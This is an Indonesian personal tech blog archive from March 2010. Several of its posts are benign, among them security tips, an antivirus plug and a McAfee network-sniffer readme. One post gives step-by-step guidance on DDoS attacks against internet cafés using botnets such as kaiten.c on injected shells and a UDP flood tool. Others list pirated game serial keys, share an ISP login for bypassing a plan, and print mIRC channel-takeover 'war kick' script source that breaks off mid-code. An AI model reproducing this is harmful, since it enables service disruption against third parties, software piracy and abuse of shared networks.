Senin, 29 Maret 2010

Mau Aman Account Texas Holdem Poker dan Facebook Anda?

1.Belajar Jaringan & komputer [NGENET ABIS]

2.Sering Baca Artikel Apa aja dikhususkan yang berkaitan dengan Tehnologi

3.Proteksi Komputer dan jaringan kamu dari hasil belajar anda misalnya kemaren anda belajar dan membaca tentang Fungsi dan kegunaan firewall serta lain lain sebagainya yg bersifat membahas vurneability di suatu system.

4.Makan buat mengisi tenaga biar Fresh

5.Santai sambil baca koran

6.Telpon-telponan sama pacar

7.Buka Facebook.. Set Rules account anda mengenai semua informasi yang berharga agar tidak mudah diketahui orang banyak misalnya seperti nomor hp,alamat,dll.

8.pastikan email anda Security Question serta passwordnya "STRONG DAN KUAT" dalam arti terkombinasi dengan baik dan mudah diingat biar kagak mudah di tebak.Dan jangan lupa setiap bulan Ganti password

9.Kalo pas ngenet di warnet mesti hati-hati ama yang namanya tools "Hacking LAN & ROUTER" seperti contoh sedikitnya cain and abel,keylogger,radmin,vnc,wireshark,dan lain sebagainya silahkan baca "waspada online di warnet" untuk proteksinya

10.Evaluasi apa yg didapat hari ini dan pikirkan apa yang besok akan dilakukan

11.Sleep well and have fun

ref:
from my brain

Smadav 2010 - Indonesian Antivirus




This Antivirus can colaboration with other antiviruses,try it for protection.

* SmaRTP Technology, SmaRT-Protection
* Smad-Behavior Technology
* Smad-Lock Technology
* Smart Scanner
* Fast cleaner file infection
* Repair (1500 value) Registry
* New Update
* Free
* Portable dan support OS Windows 2000/XP/Vista/7




Link download : http://www.smadav.net/download/?mirror


have fun

refern:

http://www.smadav.net

McAfee CSniffer v1.0.0.3 command line



Wow,McAfee Aurora release new tools for detection Vurneability.We can download from here: http://www.foundstone.com/us/resources/freetools/csniffer.zip



About this tool

McAfee has developed this free utility as a proof-of-concept to highlight the ease of which critical network information is obtained without performing any kind of active scanning.

* File: CSniffer.exe
* Size: 105984 bytes
* File Version: 1, 0, 0, 3
* Modified: Wednesday, March 03, 2010, 2:21:22 PM
* Md5: DE9A9EB7AC8FA9D2EDF41C3BC85A579D
* SHA1: 6DCD9FD27125C1B85A47D0A5427B7C40FEC03FCC

NOTE: McAfee does not offer technical or customer support for this tool.
Purpose

This tool acts much like a standard Ethernet network sniffer. However, unlike a traditional packet sniffer it doesn't attempt to capture and decode all traffic but instead is geared toward discovering useful infrastructure and security-related data from the network, often from traffic not sent to or from the host system i.e. general broadcast network traffic. This data can reveal all manner of useful information, ranging from live systems on the network, hostnames, Ipv6 systems, routers and name servers, user names and passwords.

Note that the tool is not comprehensive in the amount and range of information it gathers. Rather it goes to show that your network is constantly chattering away, unintentionally revealing vast amounts of useful information that could be utilized by an attacker. This tool highlights some of that data. This is the kind of information that was obtained by systems hit by the Aurora vulnerability (Ms10-002) affecting Microsoft's Internet Explorer web browser including for example, obtaining credentials to source control systems leading to the theft of highly confidential intellectual property.
Tool requirements

CSniffer runs on Microsoft Windows systems (Windows 2000 upwards) and attempts to sniff network data in promiscuous mode. It can use one of two methods to achieve this:

* Using Windows' built-in raw sockets API (default).
* Using the WinPcap packet driver.

This necessitates running with administrator privileges.

However, when using Windows raw sockets there is a workaround that allows a regular user to run the tool.

Apply the following registry setting and reboot:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\
[DWORD] "AllowUserRawAccess"

Set the value to 1 to allow regular users to use raw sockets.

Being able to apply this registry setting itself requires administrator privileges. However, once rebooted you can use the tool in raw socket mode without requiring administrator privileges.

Utilizing a privilege escalation attack on a Windows system and applying the registry setting above could allow sniffing of all network traffic when running under a non-privileged account, something that is not generally known!
Limitations

Other than the aforementioned requirements of running under an administrator level account, there are some severe limitations when using the built-in Windows raw sockets mode.

The Microsoft raw sockets API has several restrictions that have been introduced over the years in an effort to reduce security risks associated with low level network packet access. Depending on what platform you are running on you may find that you are limited in what data can be seen on the network. A comprehensive list of all known limitations seen on different Windows operating systems and service pack levels of those operating systems has not been compiled, but here are some known issues. Again, this only applies to Windows raw sockets mode.

* Outgoing UDP and ICMP packets are not captured (OS, SP specific).
* On Windows XP Sp1, XP Sp3 and Vista no outgoing packets of any kind are captured.
* On Windows Vista with Sp1, only UDP packets are captured. TCP packets are not captured.

If you do not have the ability to use WinPcap your best bet is to use XP Sp2 or a server level OS such as Windows Server 2003.

WinPcap is a free download. Visit http://www.winpcap.org/ for details.
Usage

CSniffer is a command-line tool. Syntax for usage can be obtained by typing

CSniffer -h

or

CSniffer -?

CSniffer
Command-line network sniffer and network intelligence gathering tool
Copyright (c) McAfee, Inc. 2010

Syntax:
CSniffer -t -u -i -e -b -oO -adlmnpsvwx

-a Include timestamps in output
-b Bind to the given IP address
-d Ignore duplicate data when using -p or -n
-e Log Ethernet data (WinPcap mode only)
-i Log ICMP packets
-l List the IP addresses on this system
-m Ignore traffic to or from the host (this) machine
-n Network intelligence gathering
-o Send output to file (overwrite)
-O Send output to file (append)
-p Password gathering
-s Silent mode. No packet display. Useful with -n and -p
-t [ ...] Log TCP packets. Port can be '*' for any.
-u [ ...] Log UDP packets. Port can be '*' for any.
-v Verbose output
-w Use WinPcap library instead of Windows raw sockets
-x Output packet in Hex&Text format (default text only)

-a

Timestamps will be included in the output for each event.

-b

When using raw sockets mode (default), this specifies which interface will be used, given by an associated IP address. See the -l option. When using raw sockets mode and no interface is specified, an arbitrary one is chosen by default. When using WinPcap, all interfaces are automatically used and this option is ignored.

-d

When used with -p (password gathering) or -n (network intelligence gathering) this option will attempt to only display unique messages from each source IP address. This can cut down on noise.

-e

Ethernet-level data (basically MAC addresses) will be logged. This option is only applicable when using WinPcap (-w ). It displays interesting NIC vendors such as VMWare devices. If none of -e, -i, -t or -u are specified, all protocols are automatically examined.

-i

Sniff for ICMP traffic. If none of -e, -i, -t or -u are specified, all protocols are automatically examined.

-l

List the Ipv4 addresses for this system. This can be used with -b when binding to a NIC. Only applicable to raw socket mode.

-m

Ignore traffic originating from or destined to this system (i.e. the system you're running the tool from). Only Ipv4 addresses are supported for now.

-n

Enable network intelligence gathering mode. Interesting data packets are decoded and presented to the user. The currently supported protocols are HTTP HEAD, GET, POST and OPTIONS requests (various TCP ports), BootP/DHCP (UDP ports 67, 68), TFTP (UDP port 69), NetBIOS Name Requests (UDP port 137), NetBIOS Browser Service (UDP port 138) and SSDP (UDP port 1900). In addition some interesting MAC vendors are identified and detected Ipv6 addresses on the network are shown.

-o

Send output to the given file. Output is simultaneously displayed in the command window and saved to the specified file. If the file exists its contents are deleted.

-O

Send output to the given file. Output is simultaneously displayed in the command window and saved to the specified file. If the file exists its contents are appended with the new output.

-p

Password gathering mode. Common protocols are examined for credentials and they are displayed in the output. The currently supported protocols are FTP (TCP port 21), POP3 (TCP port 110), NNTP (TCP port 119), SMB hashes (TCP port 445), Perforce (TCP port 1666) and many common HTTP ports (basic auth).

-s

Silent mode. No packet dumps are displayed. Useful if you are not interested in the actual raw contents of the packets.

-t

Log TCP packets. Optional port numbers to examine can be specified. If none of -e, -i, -t or -u are specified, all protocols are automatically examined.

-u

Log UDP packets. Optional port numbers to examine can be specified. If none of -e, -i, -t or -u are specified, all protocols are automatically examined.

-v

Verbose mode. Displays which command options are specified on the command line. Use this option as the first parameter.

-w

Use the WinPcap packet driver rather than the Windows raw sockets API. This option is highly recommended but requires you already have WinPcap installed.

-x

Output the packet's raw contents in Hex and Text format. Without this option the output format is text only.

Examples

Usage is best demonstrated through examples. All examples shown here are specifying the use of WinPcap (-w).

Show the tool's syntax.

CSniffer -h

Raw packet capture of everything, displaying text-only output (default).

CSniffer -w

Raw packet capture of everything, displaying Hex and Text output.

CSniffer -wx

Raw packet capture of TCP port 80 traffic, displaying Hex and Text output.

CSniffer -wx -t 80

Raw packet capture of TCP port 80 and port 8080 traffic, displaying Hex and Text output.

CSniffer -wx -t 80 8080

Raw packet capture of TCP port 80 and UDP port 137 traffic, displaying Hex and Text output.

CSniffer -wx -t 80 -u 137

Network intelligence gathering mode. Don't display packet dumps.

CSniffer -wns

Network intelligence gathering mode for UDP port 138 traffic only. Remove duplicate entries. Don't display packet dumps.

CSniffer -wnds

Password monitoring mode. All protocols. Remove duplicate entries. Don't display packet dumps.

CSniffer -wpds

Network intelligence gathering and password sniffing. Remove duplicate entries. Don't display packet dumps.

CSniffer -wnpds

Network intelligence gathering and password sniffing. Remove duplicate entries. Don't display packet dumps. Ignore traffic to and from this machine

CSniffer -wnpdsm

Network intelligence gathering and password sniffing. Remove duplicate entries. Don't display packet dumps. Ignore traffic to and from this machine. Send output to a file.

CSniffer -wnpsdm -o log.txt

Network intelligence gathering and password sniffing. Remove duplicate entries. Don't display packet dumps. Ignore traffic to and from this machine. Send output to a file, appending to it.

CSniffer -wnpsdm -O log.txt

Network intelligence gathering and password sniffing. Remove duplicate entries. Don't display packet dumps. Ignore traffic to and from this machine. Show timestamps. Send output to a file, appending to it.

CSniffer -wnpsdma -O log.txt

Updates

Check the McAfee website for updates to this tool.

http://www.mcafee.com/911/
Feedback

Please submit all questions, comments, and inquiries regarding McAfee free tools via email only: freetools@mcafee.com. Although McAfee does not offer technical or customer support for these tools, your feedback and bug reporting is appreciated.


referen:

http://download.mcafee.com/products/tools/csniffer/readme.html
http://www.foundstone.com/us/resources/proddesc/csniffer.htm

Minggu, 28 Maret 2010

Watching/Nonton TV Online with Much Channel Using TVU Player


Anda bete,jenuh sedangkan TV dirumah lagi rusak atau emang nggak punya TV hehe just kidding bisa download software ini buat nonton TV secara online. silahkan download di http://tvuplayer.en.softonic.com/download

screenshot:







HTML Encrypter and Decrypter

Jika anda ingin melakukan encrypting pada file berbahasa HTML agar tidak mudah di lihat oleh orang lain bisa mengunjungi website http://www.iwebtool.com/html_encrypter.Cukup submit HTML code anda.Berikut ini screenshotnya





Dan apabila jika ingin dencrypting file yang terenkripsi bisa mengunjungi website http://www.gooby.ca/decrypt/




Have fun :p

ref:
http://www.iwebtool.com/html_encrypter
http://www.gooby.ca/decrypt/

Shell Gratisan bisa load psyBNC and Eggdrop

Hehe langsung saja kalo lagi kagak ada shell inject maupun shell resmi untuk bikin eggdrop atau psybnc/bnc pake alternatif lain yaitu cari shell yang gratisan.Penulis cuma menggunakan shell gratisan dari sign.io sama http://webenabled.com.

1.sign.io [http://sign.io]



Simpel mudah dan cepat menggunakan shell gratisan ini support ssh and ftp login.Silahkan registrasi dan kemudian load menggunakan Putty.Silahkan download di http://en.softonic.com atau googling saja.Setelah anda login masuk ke shell,upload file pada directory /public_html file psy atau eggdrop anda dan lakukan penginstallan.



Pada saat ingin mengedit file misalnya psybnc.conf atau eggdrop.conf Karena Text Editor yang di gunakan disini adalah vi bukan nano/pico bikin pusing kepala penulis saja karena dari dulu memang gak suka text editor vi jadi kita tambahkan di profile sedikit source code seperti ini untuk mencari text editor nano atau pico di bash shell.

-------------------------------------------------------------------------------------
#######
#######
### Begin: Nano/Pico search: Look for NANO or PICO in common locations, add a full path location as an alias to both or one-of them.
### Also, make my environment variable EDITOR and VISUAL equal to the pico/nano binary if one exists
#######
#######

PROFILE_VERSION=0.1
PROFILE_STRING="[Bash Profile v$PROFILE_VERSION]"

NANO_LOCATION=`which nano 2>&1`
PICO_LOCATION=`which pico 2>&1`

NANO_LOC_FIRSTCHAR=${NANO_LOCATION:0:1}
PICO_LOC_FIRSTCHAR=${PICO_LOCATION:0:1}

if [[ "$NANO_LOC_FIRSTCHAR" != "/" && "$PICO_LOC_FIRSTCHAR" != "/" ]]; then
EDITOR_LOCATIONS=(/bin/ /var/ /usr/bin/ /usr/local/bin/ /opt/bin/ /opt/local/bin/ /sbin/)
EDITOR_DIR=""

for ((i=0;i<${#EDITOR_LOCATIONS};i++)); do
if [ -x ${EDITOR_LOCATIONS[${i}]}/nano ]; then
NANO_LOCATION=${EDITOR_LOCATIONS[${i}]}nano
NANO_LOC_FIRSTCHAR=${NANO_LOCATION:0:1}
EDITOR_DIR=${EDITOR_LOCATIONS[${i}]}
echo "$PROFILE_STRING Found nano in ${EDITOR_DIR} !" >&2
fi
done

for ((i=0;i<${#EDITOR_LOCATIONS};i++)); do
if [ -x ${EDITOR_LOCATIONS[${i}]}/pico ]; then
PICO_LOCATION=${EDITOR_LOCATIONS[${i}]}pico
PICO_LOC_FIRSTCHAR=${PICO_LOCATION:0:1}
EDITOR_DIR=${EDITOR_LOCATIONS[${i}]}
echo "$PROFILE_STRING Found pico in ${EDITOR_DIR} !" >&2
fi
done
fi

if [[ "$NANO_LOC_FIRSTCHAR" != "/" && "$PICO_LOC_FIRSTCHAR" == "/" ]]; then
echo "$PROFILE_STRING Only pico found ($PICO_LOCATION), adding alias for nano."
alias pico=$PICO_LOCATION
alias nano=$PICO_LOCATION
export EDITOR=$PICO_LOCATION
export VISUAL=$PICO_LOCATION
fi
if [[ "$NANO_LOC_FIRSTCHAR" == "/" && "$PICO_LOC_FIRSTCHAR" != "/" ]]; then
echo "$PROFILE_STRING Only nano found ($NANO_LOCATION), adding alias for pico."
alias pico=$NANO_LOCATION
alias nano=$NANO_LOCATION
export EDITOR=$NANO_LOCATION
export VISUAL=$NANO_LOCATION
fi
if [[ "$NANO_LOC_FIRSTCHAR" == "/" && "$PICO_LOC_FIRSTCHAR" == "/" ]]; then
echo "$PROFILE_STRING Nano and Pico already in path (nano in $NANO_LOCATION; pico in $PICO_LOCATION)."
alias pico=$NANO_LOCATION
alias nano=$PICO_LOCATION
export EDITOR=$NANO_LOCATION
export VISUAL=$NANO_LOCATION
fi
if [[ "$NANO_LOC_FIRSTCHAR" != "/" && "$PICO_LOC_FIRSTCHAR" != "/" ]]; then
echo "Nano or pico not found. Yuck."
export EDITOR=vi
export VISUAL=vi
fi

#######
#######
### End: Nano/pico search
#######
#######


-------------------------------------------------------------------------------

command:

[0931][rob@machine:~]$ source ./.profile
[Bash Profile v0.1] Found pico in /opt/bin/ !
[Bash Profile v0.1] Only pico found (/opt/bin/pico), adding alias for nano.
[0931][rob@machine:~]$


Kalo mau lebih cepat tinggal login saja pake Winscap [SFTP SCP FTP CLIENT] gampang untuk mengedit-edit file yang ingin di edit.Jadi gak perlu repot-repot mencari nano atau pico di bash shell.



2.webenabled.com [http://webenabled.com]



silahkan register dan kemudian pilih yang free trial[30 days].Web hosting ini saya coba bisa untuk load eggdrop maupun psybnc/bnc.Anda akan diberikan username dan password seperti contoh di bawah ini:


URL: http://ygcmfp.dev3.webenabled.net

SSH/SCP/SFTP Access
Username: w_ygcmfp Password: grease!small&kicked

Application login
Username: admin Password: xs9cz4mdvr

MySQL login
Username: w_ygcmfp Password: xs9ez4myvr

Setelah mendapatkan ini baru cobalah anda membuat sebuah project untuk web anda misalnya menginstall cms joomla dan sebagainya.Login lewat putty dan masuk pada directory public_html/username-anda/ kemudian silahkan upload file-file anda baik itu psybnc/eggdrop dan lain lain silahkan lakukan penginstallan.Silahkan mencari shell gratisan lainnya masih banyak dengan berbagai macam rulesnya.

Have Fun


ref:
http://google.com/search?q=shell+gratis
http://sun3.org/archives/65

Senin, 22 Maret 2010

Serial Key for My Favorite Game [CSCZ and FEAR COMBAT]

Counter Strike




Counter Strike Condition Zero:

5ZN2D-DHZ4F-3HWVC-DYVQG-MBHJB

Counter Strike v1.6:

5RP2E-EPH3K-BR3LG-KMGTE-FN8PY
ax24s-wdf25-rtf25-ab225-od1f4
as125-fgtr2-orui2-pt225-ptit2

Fear Combat:



NAD3-BUC8-XUT4-LUN3-6885
9JXA-UAJX-QCJQ-EU3T-EBCC
JAWW-PAP3-QPJU-U3AA-9AFE
EJ7C-MM3U-7C73-MAXU-B0C8
97U9-3779-TSPE-PW9C-58D7
J?MU-ACPW-J7AM-X?EP-04A0
J4E7-7UWM-7CM7-PQMP-6E4C
C4QP-3C7U-JEQ4-EMCC-7460
AXQC-X4CE-4TX4-WESJ-F723
7Q9X-M3XU-MMCE-PTWS-27C9

Playing Using Cheat menu Conflict Global Storm [PC Games]

I like this game.very cool and support VGA Motherboard my PC.I hope playing multiplayer have upgrade for much player..not just 4 player.For enable/unlock cheat menu playing conflict global storm [PC GAMES] go to MAINMENU just press and hold SHIFT button then type desertwatch or confusionexpert and press ENTER Button.But need upgrade for much player i hope that.Playing this menu cannot for update your scoreboard,may be can use trainer or other cheat engine..good luck

Senin, 15 Maret 2010

Membasmi inviter di DALnet

hahaha untuk masalah inviter ini emang susah dikarenakan ada saja tehnik yang dipakai buat nginvite seseorang join ke channel yang dimaksud.Emang sih invite gak apa-apa tapi kalo mass message itu yang bikin mengganggu.Adapun tehnik-tehnik yang dipakai ada 2 type untuk saat ini yang saya ketahui yaitu dengan tehnik menggunakan Mass Private Message dan Messenger & Spier.

1. Mass Private Message

Biasanya inviter ini menggunakan script yang kerjanya hampir sama dengan echox inviter script.Dengan join di suatu channel otomatis akan mass message berupa pesan invite-nya ke daftar nickname yang ada di list channel terkecuali Operator.Cara mengatasinya dengan menggunakan bot guard yang ketika seorang user join bot langsung melakukan private message ke user tsb.Jika user tersebut inviter maka akan membalas otomatis dengan pesan invite-nya sehingga bot dengan mudah kickbanned inviter tsb.

2. Messenger and Spier

Nah untuk tehnik ini belum ada cara pencegahannya.Kinerjanya seperti berikut;

Ada 2 nick bot misalnya ce_cakepzzz dan co_cakepzzz.Ce_cakepzzz berperan sebagai messenger dan co_cakepzzz berperan sebagai spier/pengintai. Spier bot join ke suatu channel misalnya channel #jakarta dengan Ip adress *!*@125.169.xxx.xxx dan messenger bot dengan ip adress lain *!*@125.162.xxx.xx berada pada sebuah channel private seperti misalnya #privatesekali,Spier juga berada pada channel tsb.Spier bot merekam/recording daftar nickname di channel #jakarta terkecuali op baik yang baru join maupun leave dan mulai melakukan command perintah di channel #privatesekali misalnya dengan perintah "!pm [nickname]"agar messenger bot melakukan private message kepada user yang diperintah oleh spier.Tehnik inviter ini cukup membingungkan operator untuk mencegahnya,apalagi jika menggunakan banyak messenger and spier,bikin susah dikarenakan ketidaktahuan dan keterbatasan power.Untuk itu cara mencegahnya cukup melapor pada staff dalnet seperti Lemaximus serta IRCOP lainnya agar ditindak lanjuti.

Have fun

ref:dari berbagai sumber di my brain

Cara DDOS Warnet/Cybercafe dari external maupun internal

hehe iseng-iseng nih cara ddos warnet baik dari external maupun internal langsung saja ya risiko tanggung sendiri soalnya sekedar share pengetahuan doang.:P

1. External

Using Shell exploit/shell injectkan dengan menggunakan botnet

Pertama harus port scanning dulu untuk mengetahui apa jenis port yang terbuka pada suatu sistem melalui IP Adress yang digunakan victim.Apakah TCP,UDP,ICMP,IGMP dan lain lain yang terbuka.Untuk mengetahui value tentang nomor port bisa anda cari sendiri melalui googling.Untuk port scanning bisa digunakan port scanner seperti tool superscan v.4.0 atau join ke channel tetangga #passcrack di DALnet dan ketik !portscan [IP-ADDRESS-VICTIM] untuk info ketik !help.Kemudian login aja dulu ke shell injectnya terus load deh bot pitbull,kaiten.c atau running eggdrop pakai kill.tcl,atau yang lain terserah mau versi berapa untuk source codenya silahkan cari di google soalnya webhostingku pada mati hiks.Ada juga botnet-botnet lain yang bisa digunakan baik dalam bahasa pemograman perl maupun php.Kemudian Running botnya di shell injectkan kamu sesuai opsi dari script botnet tersebut.Kalau di pitbull dan kaiten ada Fitur TCP FLOOD, UDPFLOOD,SYN FLOOD,SPECIAL FLOOD,HTTP FLOOD dsb selamat mencoba.Untuk gak pakai botnet silahkan anda lihat disini http://www.foundstone.com/us/resources-free-tools.asp


2. Internal

Kalo sudah dari dalam gampang banget ngerjain victim cukup anda pakai tool udpflood.exe bisa anda download di:
http://www.foundstone.com/us/resources/termsofuse.asp?file=udpflood.zip

tinggal unzip terus running kemudian set ip adress sembarangan terserah mau 192.168.1.1 dll serta port sembarangan saja misalnya 4934 kemudian settingan pilih Opsi LAN,yang lain gak perlu dirubah terserah saja kemudian limitnya isi saja 9999999 kilobytes dan klik START..dijamin warnet/cybercafe atau victim akan ngelag/pingtimeout/freeze karena supply quota/bandwith tidak mencukupi yang mengakibatkan kehabisan bandwith dikarenakan diambil alih oleh PC anda.. selamat mencoba

have fun

ref; dari berbagai sumber dan informasi di my brain

Tips Online Using Flexi Unlimited

Gak ada lain yang paling murah cuma online pake CDMA daripada GSM yang mahal banget bikin pulsa cepet kesedot kecuali menggunakan starone dan flexi serta provider CDMA lainnya yang cukup murah.Starone awalnya aja gak macet-macet setelah registrasi paket unlimited baik harian,mingguan dan bulanan.Pemakaian selebihnya mulai deh quota dibatasi setiap 1 MB disconnected atau setiap 15 menit disconnected.Untuk alasannya silahkan hubungi costumer Representatif ISP mereka masing-masing.Begitu juga dengan flexi paket unlimited, ketika memakai username sama password yang diberikan setelah registrasi paket unlimited speed koneksinya lelet banget malahan sampai gak bisa connect.jadi langsung saja jika mau speed lumayan kenceng pakai flexi unlimited dengan menggunakan username: telkomnet@flexi password: telkom. jadi jangan gunakan username yang diberikan oleh ISP.Tapi jangan lupa dulu sebelum pakai cara ini harus registrasi paket unlimited dulu biar pulsa kagak kena sedot.Soalnya ini username sama password buat paket volume based.Selamat mencoba
Have Fun :D

Jumat, 12 Maret 2010

War Kick di Dalnet Using Silveraldo Script

Iseng iseng ada saja hal yang dilakukan oleh para chatter didalnet dengan bermain war kick baik yang multi opponent maupun single mode.Termasuk saya sendiri jadi ikut-ikutan senang bermain war kick.Ini cuma Just for Fun dan gak di bolehin di Dalnet karena flooding service.Ini Asal Scriptnya adalah Silveraldo Script dengan Sedikit Editan berikut source codenya:


--------------------------------------------------------

on *:sockopen:%sock_nick: {
if (!$sockerr) {
sx $sockname USER $rn * * : 4,4_ 0m|®¢ 4,4_ 0®Ã«d 4,4_ 0åñd 4,4_ 0Whitë 4,4_
sx $sockname NICK %sock_nick
se info 4 $+ $sockname still try to connect...
}
}
on *:sockread:%sock_nick: {
if ($sockerr) { return } | var %read | sockread %read
if (!$sockbr) { return }
tokenize 32 %read
if ($regex($1,^ERROR)) { sockclose $sockname }
elseif ($regex($1,^PING$)) { sx $sockname PONG $2 }
elseif ($regex($2,^(432|433)$)) { sx $sockname NICK $rn }
elseif ($regex($2,^NICK$)) { sr $sockname $1- }
elseif ($regex($2,^001$)) { sc $sockname $1- }
else {
if (%warmodeX) {
var %g goto g
if ($istok(%trig,$2,46)) { goto $left($2,3) } | %g
:kic | on:kick $sockname $1- | %g
:inv | on:invi $sockname $1- | %g
:346 | raw:nvx $1- | %g
:348 | raw:nvx $1- | %g
:353 | raw:353 $5- | %g
:303 | raw:303 $1- | %g
:461 | raw:461 $1- | %g
:367 | raw:367 $1- | %g
:368 | raw:368 $1- | %g
:401 | raw:401 $3 | %g
:441 | raw:441 $3 | %g
:par | on:part $1- | %g
:qui | on:quit $1- | %g
:mod | on:mode $sockname $1- | %g
:not | on:noti $sockname $1- | %g
:joi | on:join $sockname $1- | %g
:471 | raw:loc $sockname $4 l | %g
:473 | raw:loc $sockname $4 i | %g
:474 | raw:loc $sockname $4 b | %g
:475 | raw:loc $sockname $4 k | %g
:477 | raw:loc $sockname $4 R | :g
}
}
}
alias rn { return unrealx }
alias sx { sockwrite -nt $1- }
alias se { echo -ct $1 @PlayGround * $2- }
alias sn { return $iif($pos($1,!),$mid($1,2,$calc($v1 - 2)),$right($1,-1)) }
alias sl { return $right($1,$calc($len($1) - 1)) }
alias sr {
var %n $sn($2), %nn $right($4,-1)
if ($1 == %n) {
sockrename $1 %nn
set %sock_nick %nn
set %ally $reptok(%ally,%n,%nn,1,32)
set %name $reptok(%name,%n,%nn,1,32)
}
elseif ($istok(%ally,%n,32)) { %ally = $reptok(%ally,%n,$4,1,44) }
else { if ($istok(%foes,%n,44)) { %foes = $reptok(%foes,%n,$4,1,44) } }
se nick %n is now known as %nn
}
alias sc {
set %serv $sn($2)
set %myip $mask($11,2)
se info 14,1 $1 14,1 connected on server 14 %serv
ident_sock
}
alias _replace { return $replace(%foes,$chr(44),$chr(32)) }
alias chnick { if (%imop) { sx %sock_nick nick $rn } }
alias on:kick {
if ($4 == %chan) {
var %n = $sn($2)
set %name $remtok(%name,$5,1,32)
if ($5 == $1) && (!$istok(%ally,%n,32)) {
set %foes $addtok(%foes,%n,44)
set %dark $addtok(%dark,$mask($2,2),32)
set %fast $iif(%fast,0,0)

set %imop $false
unset %kick %nvxa %nvxb
if (%pkmsg) { set %pick_kmsg $replace($sl($6-),$chr(32),$chr(160)) }
if (%fjdeop) {
sx $1 cs deop %chan $_replace
}
sx $1 $iif(%fast,join,cs invite) $4
}
else {
set %kick $remtok(%kick,$5,1,44)
if ($1 == %n) {
}
if ($1 == %n) && (%chk) && (!%chn) { set -u5 %chn ! | chnick }
}
}
se kick $iif($5 == $1,You were,$5 was) kicked from $4 by %n $+($chr(40),$iif($left($6,1) == :,$right($6-,-1),$6-),,$chr(41))
}
alias on:invi {
var %c $right($5,-1)
if (%c == %chan) && ($istok(%ally,$sn($2),32)) {
unset %nvxa %nvxb
set %r303 $true
set %rban $true
set %wban %dark
sx $1 ison $replace(%foes,$chr(44),$chr(32))
if (%wideban) { sx $1 mode %c +b }
if (%invexremover) {
sx $1 mode %c +I
sx $1 mode %c +e
}
}
}
alias raw:303 { if (%r303) { io $1- } }
alias raw:461 { if (%r303) { io $1- } }
alias io {
if ($4 != ISON) {
var %p $right($4-,-1)
.timerdeop -m 1 $calc(%join %sign %jvar) sx %sock_nick cs deop %chan %p
.set %foes $replace(%p,$chr(32),$chr(44))
}
else { unset %foes }
.timerjoin -m 1 %join sx %sock_nick join %chan
.set %r303 $false
}
alias raw:367 { if (%rban) { rb $5 } }
alias raw:368 { if (%rban) { rb } }
alias rb {
if ($1) { if ($wildtok(%dark,$mask($1,2),1,32)) { set %wban $remtok(%wban,$v1,1,32) } }
else { set %rban $false }
}
alias raw:nvx {
if ($4 == %chan) {
if ($left($6,$calc($pos($6,!) - 1)) != %sock_nick) && ($istok(346.348,$2,46)) {
if ($len(%nvxa) < 6) {
set %nvxa $+(%nvxa,$iif($2 == 346,I,e))
set %nvxb %nvxb $5
}
}
}
}
alias on:mode {
var %n $sn($2), %f $left($5,2)
if (%f == +o) {
if ($6 == $1) {
if (%n == Chanserv) {
set %reopex $true
if (%kick) { sx $1 kick $4 %kick $kmsg }
if ($gettok(%kick,5-8,44)) { sx $1 kick $4 $v1 $kmsg }
if ($gettok(%kick,9-12,44)) { sx $1 kick $4 $v1 $kmsg }
if (%modeplusie) { sx $1 mode $4 +Ie %myip %myip }
if (%wideban) {
if (%wban) { sx $1 mode $4 $+(+,$str(b,$numtok(%wban,32)),-,bb) %wban %sock_nick * $me }
}
if (%invexremover) {
if (%nvxa) { sx $1 mode $4 $+(-,%nvxa) %nvxb }
elseif (%wex) { sx $1 mode $4 $+(-,$str(e,$numtok(%wex,32))) %wex | unset %wex }
}
}
set %imop $true
}
}
elseif (%f == -o) && ($6 == $1) {
set %imop $false
unset %nvxa %nvxb
}
elseif (%f == +e) && (%invexremover) && ($istok(%foes,%n,44)) {
var %ex $6
if (%imop) { sx $1 mode $4 -e %ex }
else { set %wex $addtok(%wex,%ex,32) }
unset %ex
}
elseif (%f == -b) && ($wildtok(%dark,$6,1,32)) {
var %b $v1
set %wban $addtok(%wban,%b,32)
if (%banlocker) {
if (%imop) { sx $1 mode $4 +b %b }
}
}
else { if (%f == +b) && ($wildtok(%dark,$6,1,32)) { set %wban $remtok(%wban,$v1,1,32) } }
se mode %n sets mode: $5-
}
alias on:noti {
var %n $sn($2), %p $right($5-,-1)
if (%n == Chanserv) {
if ($7 == deopped) && ($4 == %chan) {
if ($8 == $1) {
var %d $right($5,-1)
if ($istok(%name,%d,32)) {
if (%onopdeop) { sx $1 cs deop $4 %d }
set %foes $addtok(%foes,%d,44)
set %kick $addtok(%kick,%d,44)
}
if (%reopex) { sx $1 cs op $4 $1 }
if (%ondeopchk) && (!%chnk) { set -u5 %chnk ! | chnick }
}
}
else {
if (*is not online* iswm %p) {
set %foes $remtok(%foes,$strip($6),1,44)
set %kick $remtok(%kick,$strip($6),1,44)
}
}
}
if (*Too many nick changes* iswm %p) {
if (%ondeopchk) { set %ondeopchk $false | .timerchk 1 25 set %ondeopchk $true }
if (%chk) { set %chk $false | .timerchk 1 25 set %chk $true }
}
if ($regex($4,^#)) { se notice $+(-,%n,:,$4,-) %p }
else { se notice $+(-,%n,-) %p }
}
alias catX {
if (%logoX == $false) { return }
elseif (%kicklogo.1) { return 4,4_ 0m|®¢ 4,4_ 0®Ã«d 4,4_ 0åñd 4,4_ 0Whitë 4,4_ | halt }
}
alias kmsg { return $iif(%pick_kmsg,%pick_kmsg,$kik_msg) }
alias on:join {
var %c = $right($4,-1), %n = $sn($2)
if (!$istok(%ally,%n,32)) && ($istok(%dark,$mask($2,2),32)) && ($1 != %n) && (%c == %chan) {
set %reopex $true
if (%ojdeop) { sx $1 cs deop %chan %n }
;sockwrite -tn $1 cs op %chan %sock_nick
if (%imop) { sx $1 kick %c %n $kmsg }
if (%ojban) { sx %sock_nick mode %c +b %n }
set %kick $addtok(%kick,%n,44)
set %foes $addtok(%foes,%n,44)
}
if (!$istok(%ally,%n,32)) { set %name $addtok(%name,%n,32) }
se join %n joins %c
}
alias raw:loc {
if ($2 == %chan) {
if ($2 == %chan) {
sx $1 cs invite $2
if ($3 === b) { .timerunban -m 1 %join sx %sock_nick cs unban $2 }
}
}
}
alias on:part { if ($3 == %chan) { pq $1 part $3 } }
alias on:quit { pq $1 quit }
alias pq {
var %n $sn($1)
set %foes $remtok(%foes,%n,1,44)
set %kick $remtok(%kick,%n,1,44)
set %name $remtok(%name,%n,1,44)
se part %n $2 $+ s $iif($3,$3,IRC)
}
alias raw:401 { set %foes $remtok(%foes,$1,1,44) }
alias raw:441 { set %kick $remtok(%kick,$1,1,44) }
alias raw:353 {
if ($1 == %chan) {
set %name $remove($3-,@,+)
set %temp $numtok(%foes,44)
